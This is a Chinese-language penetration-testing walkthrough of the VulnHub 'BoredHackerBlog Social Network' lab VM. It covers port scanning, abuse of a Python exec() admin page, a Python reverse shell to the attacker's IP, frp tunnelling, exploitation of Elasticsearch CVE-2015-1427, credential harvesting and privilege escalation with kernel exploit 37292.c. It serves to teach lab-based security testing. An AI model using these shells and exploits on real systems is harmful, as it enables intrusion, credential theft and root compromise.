VnlnHub BOREDHACKERBLOG SOCIAL NETWORK
字数 1337 2025-08-12 11:34:19
BOREDHACKERBLOG SOCIAL NETWORK 靶场渗透测试教学文档
靶场环境搭建
-
下载靶场:
- 下载地址:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
- 文件格式:.ova虚拟机压缩文件
-
导入虚拟机:
- 使用VMware导入.ova文件
- 网络模式设置:
- 推荐使用NAT模式
- 也可使用桥接模式(需与Kali攻击机保持一致)
信息收集阶段
-
扫描目标IP:
- 假设Kali攻击机IP为192.168.52.128
- 推测靶机IP为192.168.52.129
-
端口扫描:
nmap -sT -p 0-65535 -A 192.168.52.129- 开放端口:
- 22端口:SSH服务
- 5000端口:Werkzeug httpd 0.14.1 (Python web服务)
- 开放端口:
Web应用渗透
-
初步测试:
- 访问http://192.168.52.129:5000
- 测试评论功能,确认无XSS漏洞
-
目录扫描:
- 发现/admin路径
- 存在代码执行功能,使用exec()执行Python代码
-
代码执行利用:
- 尝试执行Python反弹shell:
import os os.system('nc -l -p 4444 -e /bin/bash')- 失败原因:目标主机无netcat工具
-
替代反弹shell方法:
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.52.128",4445)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]);- 在Kali上监听:
nc -lvnp 4445- 成功获取shell
内网渗透
-
环境确认:
- 发现处于Docker容器环境
-
内网主机扫描:
- 发现活跃主机:172.17.0.1-3
-
内网穿透设置:
- 使用frp工具进行内网穿透
- 下载地址:https://github.com/fatedier/frp
- 配置frpc.ini文件:
- 设置服务器地址为Kali攻击机IP
- 添加socks代理配置
-
文件传输:
- 在Kali搭建临时web服务:
python3 -m http.server 80 # 或 python2 -m SimpleHTTPServer 80- 在靶机下载frp客户端:
wget http://<kali_ip>/frpc wget http://<kali_ip>/frpc.ini -
启动frp服务:
- Kali端:
./frps -c frps.ini- 靶机端:
./frpc -c frpc.ini -
配置代理:
- 修改/etc/proxychains4.conf
- 添加socks代理配置
-
内网扫描:
proxychains nmap -sT -A 172.17.0.2- 发现9200端口:Elasticsearch REST API 1.4.2
Elasticsearch漏洞利用
-
漏洞识别:
- CVE-2015-1427 (Elasticsearch 1.4.2 RCE漏洞)
-
利用漏洞:
- 下载并执行对应exp
- 获取root权限
- 发现passwords文件,提取密码和hash
SSH登录
- 尝试登录:
- 使用获得的凭据尝试SSH登录
- 只有john用户可以成功登录
权限提升
-
信息收集:
- 使用linpeas工具进行自动化信息收集
./linpeas.sh -
内核漏洞利用:
- 搜索Linux 3.13内核漏洞:
searchsploit linux 3.13- 选择漏洞37292.c
-
漏洞利用准备:
- 复制exp到本地:
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root- 修改代码(移除gcc依赖部分)
- 在Kali上编译:
gcc 37292.c -o exploit -
文件传输与执行:
- 上传编译后的exploit和ofs-lib.so到靶机
- 赋予执行权限:
chmod +x exploit- 执行:
./exploit- 成功获取root权限
总结
本渗透测试完整流程包括:
- 靶场环境搭建
- 信息收集与端口扫描
- Web应用漏洞利用(代码执行)
- 内网穿透与内网主机发现
- Elasticsearch RCE漏洞利用
- 凭据获取与SSH登录
- 内核漏洞提权
关键点:
- 灵活运用多种反弹shell方法
- 内网穿透技术的应用
- 特定服务版本漏洞的识别与利用
- 权限提升时的多种尝试策略